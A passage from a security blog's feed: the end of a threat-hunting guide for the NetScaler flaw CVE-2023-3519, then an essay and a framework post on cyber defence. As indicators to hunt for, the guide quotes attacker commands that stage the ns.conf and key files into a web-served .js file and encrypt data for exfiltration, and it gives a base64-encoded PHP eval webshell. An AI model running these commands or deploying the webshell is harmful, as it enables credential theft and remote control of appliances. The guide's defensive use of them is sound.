ns.log)</p></li><li><p><code>/var/vpn</code></p></li><li><p><code>/var/netscaler/logon</code></p></li><li><p><code>/var/python</code></p></li><li><p><code>/var/crontabs</code></p></li><li><p><code>/tmp</code></p></li><li><p><code>/flash/nsconfig.ns</code></p></li><li><p><code>NSPPE core dumps in /core/</code></p></li><li><p>Process dumps generated by default</p></li><li><p>File listings (you will have to use a combination of "find" and "-newermt" to list files in Netscaler flavour of FreeBSD)</p></li><li><p>All&nbsp;<code>PHP, JS, JSP, PNG, HTML, XML, PL</code>&nbsp;files</p></li><li><p>Listing of all ELF files with their timestamps (and better even if you can collect all ELF files themselves)</p></li><li><p>process lists</p></li><li><p>socket and port lists</p></li><li><p>mount points</p></li></ul><h3>02 | Analyse HTTP Logs</h3><p>Look into:</p><ul><li><p>Check logs for successful requests from external IPs that are uncommon</p></li><li><p>Check logs for successful requests from external IPs to .php, .pl, .png, .html or .js files. Take note of those and compare them with file listings to understand whether they were added/modified recently, mostly prior to patching</p></li><li><p>Investigate httperror logs for potential error messages caused by exploitation attempts</p></li></ul><h3>03 | Investigate Suspicious Commands in Bash and Sh History</h3><p>Based on the TI from&nbsp;<a href="https://www.mandiant.com/resources/blog/citrix-zero-day-espionage?ref=quasarops.com">Mandiant</a>&nbsp;and&nbsp;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a?ref=quasarops.com">Cisa</a>&nbsp;there are a few patterns to check for:</p><ul><li><p>Attempts at copying or moving "<strong>ns.conf</strong>" (which holds the NetScaler global configuration) as well as the F1 and F2 key files into a single destination file. You need all three files to be able to decrypt passwords inside&nbsp;<code>ns.conf</code>. Example:</p><ul><li><p><code>cat /flash/nsconfig/ns.conf &gt;&gt;/var/vpn/themes/insight-new-min.js</code></p></li><li><p><code>cat /nsconfig/.F1.key &gt;&gt;/var/vpn/themes/insight-new-min.js</code></p></li><li><p><code>openssl base64 -d</code></p></li><li><p><code>cp /usr/bin/bash</code></p></li></ul></li><li><p>The threat actors attempted to deactivate the NetScaler High Availability File Sync (<code>nsfsyncd</code>). Search for signs of deactivation for this service</p></li><li><p>The threat actors deleted the authorization configuration file (<code>/etc/auth.conf</code>), likely to prevent configured users (e.g., admin) from logging in remotely</p></li><li><p>Use of cp command to rename files to unassuming extensions (like&nbsp;<code>.png or .js</code>)</p></li><li><p><code>Ping</code>&nbsp;requests to Google to check internet connectivity</p></li><li><p><code>Curl</code>&nbsp;usage to download external payloads</p></li><li><p>Encryption of data staged for exfiltration, mostly using "tar". Example:&nbsp;<code>tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k &lt;&gt; -out /var/tmp/test.tar.gz</code></p></li><li><p>Commandlines that include BASE64 encoded strings. Example:&nbsp;<code>echo PD9waHAgDQpmb3IgKCR4PTA7ICR4PD0xOyAkeCsrKSB7DQogICAgICAgICRDWzFdID0gJF9SRVFVRVNUWyIxMjMiXTsNCiAgICAgICAgQGV2YWwNCiAgICAgICAgKCRDWyR4XS4iIik7DQp9IA0KPz4=</code></p></li></ul><p>Some analytic approaches and examples:</p><ul><li><p>Check bash log files and sort by frequency, less frequent commands at the top:&nbsp;<code>cat /var/log/bash.log | grep -Eio "shell_command=.*$" | sort | uniq -c | sort -n &amp;&amp; zcat /var/log/bash*.gz | grep -Eio "shell_command=.*$" | sort | uniq -c | sort -n /2</code></p></li><li><p>Check for recently modified/written XML files, sort by date, most recent ones at the bottom:&nbsp;<code>find / -name "*.xml" -exec ls -haltr {} \; | sed 's/ */ /g' | sort -k 8</code></p></li><li><p>Check for recently modified/written XML files, since the exploitation window, chain here any other extensions that are relevant based on available Threat Intelligence:&nbsp;<code>find / -name "*.xml" -newermt "2023-06-01" &amp;&amp; find / -name "*.pl" -newermt "2023-06-01" &amp;&amp; find / -name "*.py" -newermt "2023-06-01"</code></p></li><li><p>Check for suspicious running processes and their connections:&nbsp;<code>lsof -RPni &amp;&amp; lsof -PnP (you could further filter with grep)</code></p></li><li><p>Check for further suspicious processes:&nbsp;<code>ps auxd | grep nobody</code></p></li></ul><h3>04 | Investigate Scheduler Services</h3><p>(<a href="https://www.mandiant.com/resources/blog/citrix-zero-day-espionage?ref=quasarops.com">Mandiant</a>) The threat actor installed a persistent tunneler on the appliance, the tunneler provided encrypted reverse TCP/TLS connections to a hard-coded command and control address. The attacker created a crontab entry for the&nbsp;<code>nobody</code>&nbsp;user to ensure the tunneler ran persistently.</p><ul><li><p>Check for any new scheduled jobs under the "nobody" user</p></li><li><p>Check for unusual commandlines in root crontab and the cron execution history in /var/cron.log</p></li></ul><p>Some analytic approaches:</p><ul><li><p>Check your crontab logs:&nbsp;<code>cat /var/log/cron | sed 's/ */ /g' | cut -d" " -f 10 | sort | uniq -c &amp;&amp; zcat /var/log/cron*gz | sed 's/ */ /g' | cut -d" " -f 10 | sort | uniq -c</code></p></li></ul><h3>05 | Search for WebShell File Presence</h3><p>Both&nbsp;<a href="https://www.mandiant.com/resources/blog/citrix-zero-day-espionage?ref=quasarops.com">Mandiant</a>&nbsp;and&nbsp;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a?ref=quasarops.com">Cisa</a>&nbsp;reports indicate evidence of WebShells. Large-scale checks for potential WebShells coupled with manual review of suspects should be conducted.</p><ul><li><p>Run THORLite or LOKI over the collected filebase. The community Valhalla YARA rules offer a good initial indication.</p></li><li><p>Gather additional YARA rules for WebShells from publicly available sources. Also, incorporate rules from fresh OSINT. Run additional YARA rules against collected evidence.</p></li></ul><p>Some analytic approaches:</p><ul><li><p>Check the good investigative steps and YARA rules in&nbsp;<a href="https://github.com/nsacyber/Mitigating-Web-Shells?ref=quasarops.com">https://github.com/nsacyber/Mitigating-Web-Shells</a></p></li><li><p>Some extra WebShell YARA rules:&nbsp;<a href="https://github.com/jcole-sec/yara-rules/tree/master/webshells?ref=quasarops.com">https://github.com/jcole-sec/yara-rules/tree/master/webshells</a></p></li><li><p>Additional good PHP WebShell YARA rules:&nbsp;<a href="https://github.com/farhanfaisal/yararule_web?ref=quasarops.com">https://github.com/farhanfaisal/yararule_web</a></p></li></ul><h3>06 | Search for Fileless Malware</h3><p>Typical fileless malware in many linux distributions would use calls such as&nbsp;<a href="https://man7.org/linux/man-pages/man2/memfd_create.2.html?ref=quasarops.com">memfd_create()</a>&nbsp;to create an anonymous file in RAM that can be run.</p><p>The man page for memfd_create states:</p><blockquote><p><em>memfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM and has a volatile backing storage.</em></p></blockquote><p>We would normally identify this behaviour using&nbsp;<code>/proc/x/maps | grep memfd</code>. However, FreeBSD-based systems like NetScaler do not have&nbsp;<code>/proc/x/maps</code>. The closer you can get is examining shared memory objects with&nbsp;<strong>procstat</strong>:&nbsp;<code>procstat -v -a | grep 'memfd'</code></p><blockquote><p><strong>NOTE</strong>: I have not yet completely validated this approach in FreeBSD, if you have, please drop me a comment or message in LI so I can update this article</p></blockquote><p>Further analysis:</p><ul><li><p>Some in-memory malware and classic file-based WebShells might cause memory leaks that will show up as high memory or CPU consumption cycles. If we discover that a NetScaler is on high memory usage then we need to go to&nbsp;<code>/var/nslog</code>&nbsp;and then verify the&nbsp;<code>newnslog</code>&nbsp;to check ConMEM to see which module/pool is taking up the majority of the memory.</p></li><li><p>Follow further investigative approach at&nbsp;<a href="https://sandflysecurity.com/blog/detecting-linux-memfd-create-fileless-malware-with-command-line-forensics/?ref=quasarops.com">https://sandflysecurity.com/blog/detecting-linux-memfd-create-fileless-malware-with-command-line-forensics/</a></p></li><li><p>More methods:&nbsp;<a href="https://twitter.com/cr0nym/status/1681709635508617216?ref=quasarops.com">https://twitter.com/cr0nym/status/1681709635508617216</a></p></li></ul><h3>07 | Investigate Core Dumps</h3><p>Exploitation attempts and post-exploitation activity might cause processes to crash. This will trigger process dumps on NetScalers. In some instances, an&nbsp;<strong>NSPPE Core Dump</strong>&nbsp;might be generated.</p><ul><li><p>Investigate process dumps created from June 2023. Run strings to identify potentially HTTP-encoded commands or public IPs</p></li><li><p>Investigate NSPPE core dumps if any</p></li></ul><h3>08 | Analyse Network Data</h3><p>Look for</p><ul><li><p>Peaks in LDAP queries to DCs. These could indicate LDAP reconnaissance</p></li><li><p>Investigate FW or Proxy logs for indications of headless web browser or python-based request usage. Example from Mandiant TI:&nbsp;<code>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/112.0.5615.121 Safari/537.36</code></p></li><li><p>FW or IDS logs for signature triggers on traffic originating from NetScaler appliances</p></li></ul><h3>09 | Search NetScaler Configuration for Anomalies</h3><p>Triage the contents of&nbsp;<code>ns.conf</code>&nbsp;to make sure it wasn't modified to allow for hidden connectivity</p><h3>10 | Run Mandiant IOC Scanner for CVE-2023-3519</h3><p>This step was added as a late update but you could run this earlier along the chain. Just make sure you acquire your forensic artefacts first, before running the Mandiant script, since it may create entries in your bash history that could be later detected as suspicious if you run it a 2nd time.</p><p>The scanning tool is designed to be run on a live appliance or a mounted forensic image. This scanner will search across a number of sources on the appliance to look for evidence of post-exploitation activity:</p><ul><li><p>File system paths that are likely to be malware</p></li><li><p>Attacker or suspicious commands in the shell history</p></li><li><p>Files in NetScaler directories with contents matching known IOCs</p></li><li><p>Files with suspicious permissions or ownership</p></li><li><p>Suspicious crontab entries</p></li><li><p>Suspicious running processes</p></li></ul><div class="captioned-image-container"><figure><p><a href="https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner?ref=quasarops.com">Indicators of Compromise Scanner for Citrix ADC Zero-Day (CVE-2023-3519) | Mandiant</a></p><figcaption class="image-caption"><a href="https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner?ref=quasarops.com">A tool to scan Citrix ADC appliances for evidence of activity related to CVE-2023-3519.</a></figcaption><figcaption class="image-caption"><a href="https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner?ref=quasarops.com">Mandiant</a></figcaption></figure></div><h1>Outcomes</h1><ul><li><p>Produce final report, capturing any aspects of&nbsp;<a href="https://aimod2.com/docs/02-threat-hunting-missions/threat-hunting-outcomes/?ref=quasarops.com">AIMOD2 mission outcomes</a>: visibility gaps, security control issues, detection opportunities, suspicious events uncovered, enriched IOCs, further hunt opportunities</p></li><li><p>Craft an investigation playbook so that future occurrences can be more effectively approached by your hunt team</p></li><li><p>Escalate any suspicious findings using your CSIRP (Incident Response Plan) logic</p></li><li><p>Ensure patches have been applied to systems.</p></li></ul><h2>Appendix: IOCs for CVE-2023-3519</h2><div class="captioned-image-container"><figure><p><a href="https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv?ref=quasarops.com">IoCs/2023-08-25 Citrix CVE-2023-3519 attacks.csv at master &#183; sophoslabs/IoCs</a></p><figcaption class="image-caption"><a href="https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv?ref=quasarops.com">Sophos-originated indicators-of-compromise from published reports - sophoslabs/IoCs</a></figcaption><figcaption class="image-caption"><a href="https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv?ref=quasarops.com">GitHubsophoslabs</a></figcaption></figure></div>]]></content:encoded></item><item><title><![CDATA[The Journeys of a Cyberscout]]></title><description><![CDATA[We live in an economy of distraction.]]></description><link>https://www.quasarops.com/p/the-journeys-of-a-cyberscout</link><guid isPermaLink="false">https://www.quasarops.com/p/the-journeys-of-a-cyberscout</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 20 Aug 2023 10:22:56 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/1b3c1432-f69b-4682-9f1c-83bff0d22c64_1200x500.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!22Xg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!22Xg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 424w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 848w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!22Xg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Journeys of a Cyberscout&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Journeys of a Cyberscout" title="The Journeys of a Cyberscout" srcset="https://substackcdn.com/image/fetch/$s_!22Xg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 424w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 848w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!22Xg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e194083-a3f3-4e11-a2e1-2689ed18c097_1200x500.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><p>We live in an economy of distraction. In this era of fabricated intelligence, attention-sucking digital vampires, calculated buzzwords, over-optimization of every aspect of life, and the mindless echoing of information we call "news", there is little room for creative reflection and quiet pondering. If you cannot reflect, you cannot innovate, because your thoughts and actions will inevitably follow the path of least resistance. Inertia of the mind.</p><p>The endless spectacle of fleeting cyber threats captures your gaze, there is always a new shiny tool released every minute that helps bypass your defences, followed by another new tool that helps protect against the offensive tactics of the first one. There is always a new paradise promised in vendorland, and a new solution to old problems.</p><p>But who is asking <em>what </em>those problems are? Or whether we are even formulating the right ones? Which brave souls are out there <em>connecting the dots</em>?</p><p>The truth is, nobody wants to connect the dots, because it is a constant exercise in building fleeting structures out of water, that vanish as swiftly as they appear. Frankly, we are not trained to deal with complexity, we secretly relish in certainty: we like structures rather than scaffolds. Structures are more permanent. Scaffolds are temporary conditions that contribute to the accomplishment of a complex outcome. But scaffolding is a great way to <em>produce structures. </em>We neglect them though, because it's easier to cast away the perils of an uncertain world by trusting structured approaches that, despite their repeated shortcomings, they at least continue to deliver consistent failures. Don't get me wrong, I believe <em>consistency is the key</em>, but consistency in what? around what topics and in what way?</p><p>Venturing into the transient fluctuations of reality in the cybersphere is only for the daring. I invite you to join me on this journey to unknown lands where I will explore the possibility of building adaptive cyber defence practices that are fit to the problems of our new and evolving digital landscape.</p><p>Pardon me for the buzzwords, I know I am a victim -and perpetrator- of the same flaws I have just denounced! I say "cyber" a lot (and you will still hear me say that), I talk about "complexity" (like I know what it means) and I am surely letting whatever unconscious bias lives in me, filter through my thoughts and pour its nasty self-centered concoctions over these words. It is unavoidable.</p><p>But I don't consider these buzzwords anything other than (yes, you guessed it) <em>scaffolds</em>. They are useful as long as they allow me to step onto their shoulders and peak over the horizon, to understand what else is out there: what events of the cyber world we don't have words for, what approaches keep failing, and how to ask better questions, how to shape the right problems and stop failing at the wrong things.</p><p>If you want to join this Cyberscout and join a party of like-minded explorers, please subscribe, let's have some fun, gather around the fire, and share our stories.</p>]]></content:encoded></item><item><title><![CDATA[The Threat Hunting Shift. Part 4: Adversarial Framework for Tactical Cyber Defense Operations II]]></title><description><![CDATA[Continuing from Threat Hunting Shift Part 3, we will now introduce the Defend and Design domains.]]></description><link>https://www.quasarops.com/p/the-threat-hunting-shift-part-4</link><guid isPermaLink="false">https://www.quasarops.com/p/the-threat-hunting-shift-part-4</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Mon, 09 Jan 2023 09:12:00 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/1f8b78e7-fe57-4280-bf1c-361ca72f10f6_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!eImO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!eImO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!eImO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!eImO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!eImO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!eImO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Shift. Part 4: Adversarial Framework for Tactical Cyber Defense Operations II&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Shift. Part 4: Adversarial Framework for Tactical Cyber Defense Operations II" title="The Threat Hunting Shift. Part 4: Adversarial Framework for Tactical Cyber Defense Operations II" srcset="https://substackcdn.com/image/fetch/$s_!eImO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!eImO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!eImO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!eImO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c46db7-a805-48d8-84cd-8584dab2aa0a_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><p>Continuing from <a href="https://quasarops.com/the-threat-hunting-shift-part-3/">Threat Hunting Shift Part 3</a>, we will now introduce the Defend and Design domains. So without further ado, let&#8217;s dig into it!</p><blockquote><p>Note: <em>If you haven&#8217;t read the previous post, where I present the Discover and Disrupt domains, I advice you head there and give it a quick read ;)</em></p></blockquote><h2>Defend</h2><blockquote><p><em>Warlords who have mastered defence, attack from hidden places and assure their own success. They know when, where, and how to make an attack while defending their positions at the same time. These men of high perception rely on obstacles they have set up for the enemy. In understanding the attack mentality, they never permit the enemy to know where the attack is coming from</em>. (Sun Tzu, The Art of War, Book IV)</p></blockquote><p>The Defense domain is focused on a set of tactics aimed at protecting the most valuable assets and resources of the defender. A strong defence can deter an attack, as the potential costs and risks of an attack may outweigh the potential benefits. Our defenses should seek to exploit any weaknesses or vulnerabilities of the attacker, and use them to our own advantage while maintaining a strong and cohesive unit with good communication and coordination among members.</p><h3>Protect</h3><blockquote><p><em>The different measures suited to the nine varieties of ground; the expediency of aggressive or defensive tactics; and the fundamental laws of human nature: these are things that must most certainly be studied.</em> (Sun Tzu, The Art of War, Book XI)</p></blockquote><p>System protection is one of the classic and fundamental concepts in cybersecurity. It refers to ways of making systems and networks more resistant to digital attacks. Protection is based on implementing measures that ensure our systems safeguard all the components of the CIA triad (confidentiality, integrity and availability).</p><p>At the heart of the protection tactic, there are two main activities: attack <strong>prevention</strong> and <strong>system hardening</strong>.</p><p><em>Attack prevention</em> involves implementing measures to prevent unauthorized access to a system or network, and to protect against attacks that may exploit vulnerabilities in the system. This can include installing and maintaining firewalls, IDS/IPS, EDR, AV, encryption, etc.</p><p><em>System hardening</em>, on the other hand, refers to the process of making it more secure by reducing its vulnerability surface. This is typically done by reducing the number of functions the system performs, as a system that performs fewer functions has a smaller attack surface. To harden a system, several controls are applied like changing default passwords, removing unnecessary software, disabling unnecessary services and protocols, applying security patches, etc. A classic hardening framework is provided by the Center for Internet Security (CIS)<a href="https://quasarops.com/posts/threat-hunting/the-way-of-the-intercepting-fist-part-4/#fn:1"><sup>1</sup></a>. Essentially, the goal of hardening is to reduce the number of potential ways an attacker could compromise the system.</p><h3>Detect</h3><blockquote><p><em>In the midst of chaos, there is also opportunity.</em> (Sun Tzu, The Art of War, Book IV)</p></blockquote><p>Detection refers to the process of identifying the presence of a security threat or breach in computer networks. This typically involves using various tools and techniques to monitor systems by collecting remote data (telemetry), analyzing this data, and looking for signs of unusual activity that might indicate an attempted attack or compromise. The goal of detection is to identify threats as quickly as possible so that appropriate countermeasures can be taken to prevent or mitigate the potential damage.</p><p>Detection is comprised of three main components:</p><ul><li><p><strong>Sensor</strong>: the device or system that is used to collect data locally or remotely (telemetry) on target devices. The term &#8220;sensor&#8221; designates an abstract device that can take any shape like an EDR (a local system sensor that hooks on to system calls and gathers multiple types of data), IDS (sensing and collecting data from network communications), etc. Detection leverages tactics from the Discovery domain to achieve this goal. E.g. tactics like Exploration, to survey the internal infrastructure and understand data collection coverage and gaps; Collection, to effectively gather required data and centralize it in data lakes or SIEMs.</p></li><li><p><strong>Signal (Data)</strong>: the information that is gathered by the sensor and used to identify the presence of threats. This information is usually pre-processed and refined before it arrives at the next stage.</p></li><li><p><strong>Algorithm</strong>: the process that is used to analyze the signal and determine whether it meets the threshold for detection. The algorithm might be a simple rule-based system, or a more complex statistical, behavioural, or risk-based model. Machine Learning algorithms that utilize UEBA and anomaly detection to find suspicious signals are an example of the latter.</p></li></ul><p>When combined, these components produce a <strong>detector</strong>. A detector is an artifact that implements some type of logic (algorithm) based on data collected by sensors that aims to detect a specific type of suspicious activity. Detectors define different thresholds (trigger conditions) depending on the type of threat and telemetry available.</p><h3>Respond</h3><p>Entities in the cybersphere require constant vigilance and protection to build a layer of resilience against potential attacks in order to mitigate damage and reduce their future exposure. As such, <strong>Cyber Incident Response provides tactical and operational capabilities</strong> to defend against cyber attacks in the most effective manner.</p><p>In the context of the digital cybersphere, we can define Response as</p><blockquote><p>a series of organized actions that are triggered due to a disruption that poses a threat to business operations.</p></blockquote><p>This disruption does not need to cause an immediate damage to the business&#8217; continuity but <em>it carries the potential to do so</em>. Cyber Response is the process of <strong>coordinating efforts</strong> towards the identification, containment, eviction<strong>,</strong> and remediation of a cyber threat, with the goal to minimize organizational damage and reduce its future occurrence. The purpose of Response is the same as any other Cybersecurity tactic: to manage risk.</p><p>Response usually takes the shape of &#8220;Incident Response&#8221; as a function, but since our framework does not define functions, teams<strong>,</strong> or departments per se, response tactical activities refer to any type of reaction to a disruption in the connective tissue of our digital assets or services. In this sense<strong>,</strong> any planned activity that can be used in a defensive context qualifies as a response tactic: disaster recovery plans, business continuity plans, emergency response plans, risk management plans, etc.</p><h2>Design</h2><blockquote><p><em>Now the general who wins a battle makes many calculations in his temple ere the battle is fought. The general who loses a battle makes but few calculations beforehand</em>. (Sun Tzu, Book I)</p></blockquote><p>The Design domain implements tactics to aid in the process of creating a plan or solution to a problem or need. It involves identifying the needs or requirements for a product, service, or system, and developing an approach for how to meet those needs.</p><p>In order to design something effectively, we need to have a clear understanding of the problem or need that we are trying to address, as well as the materials, resources, and constraints that we have to work with. Designing usually requires the ability to think creatively and come up with innovative ideas for how to solve a problem or meet a need.</p><p>Effective communication and dissemination are important components of the design process. Communication is necessary in order to clearly articulate the problem or need that you are trying to address, as well as to gather input and feedback from others who may be involved in the design process. Thus dissemination is a necessary part of the design process, in order to share prospective or final outcomes with relevant stakeholders.</p><h3>Analyse</h3><p>Analysis is the process of breaking something down into its component parts in order to gain a better understanding of it. It often involves examining and evaluating data or information in order to identify patterns, trends, and relationships. The word comes from the Ancient Greek &#7936;&#957;&#940;&#955;&#965;&#963;&#953;&#962; (<em>analysis</em>, &#8220;breaking-up&#8221;, &#8220;untying;&#8221; from <em>ana-</em> &#8220;up, throughout&#8221; and <em>lysis</em> &#8220;loosening&#8221;).</p><p>Analysis can be qualitative, in which the focus is on understanding and interpreting the meaning of data or information, or quantitative, in which the focus is on measuring and evaluating data or information using statistical or mathematical techniques.</p><p>Analytical tactics don&#8217;t make distinctions between &#8220;analysis&#8221; and &#8220;synthesis&#8221; as opposite activities but rather it comprises both as complementary activities.</p><p>In the context of this framework, analysis is any activity performed to identify, reason and solve for a given problem.</p><h3>Plan</h3><blockquote><p><em>&#8230; a power of estimating the adversary, of controlling the forces of victory, and of shrewdly calculating difficulties, dangers and distances, constitutes the test of a great general.</em> (Sun Tzu, Book X)</p></blockquote><p>Planning involves considering the actions needed to achieve a particular goal and anticipating potential outcomes. It relies on the ability to imagine and formulate alternative futures (a capability otherwise known as foresight, the fundamental capacity for mental time travel), and is thought to have played a key role in human evolution.</p><p>From a neurological perspective, planning involves a number of brain functions including goal setting, decision making, and problem solving. It requires the activation of certain areas of the brain such as the prefrontal cortex, which is involved in higher cognitive functions such as planning and decision-making, and the basal ganglia, which is involved in the selection and initiation of actions.</p><p>Planning also involves the coordination of various brain regions and cognitive processes, such as attention, memory, and language, to generate and evaluate potential courses of action.</p><h3>Disseminate</h3><p>Dissemination refers to the act of spreading or distributing information or ideas to a wider group of people or audiences. It can refer to the distribution of information through various channels, such as through the media, through communication networks, or through public speaking and presentations. Dissemination can be used to share research findings, news, cultural events, or any other type of information with a larger group of people.</p><blockquote><p><strong>Note</strong>: <em>in a future version of the framework Disseminate may transform into Communicate as a more broad and complex activity.</em></p></blockquote><h1>References</h1><ul><li><p>Cynefin, a sense-making framework. 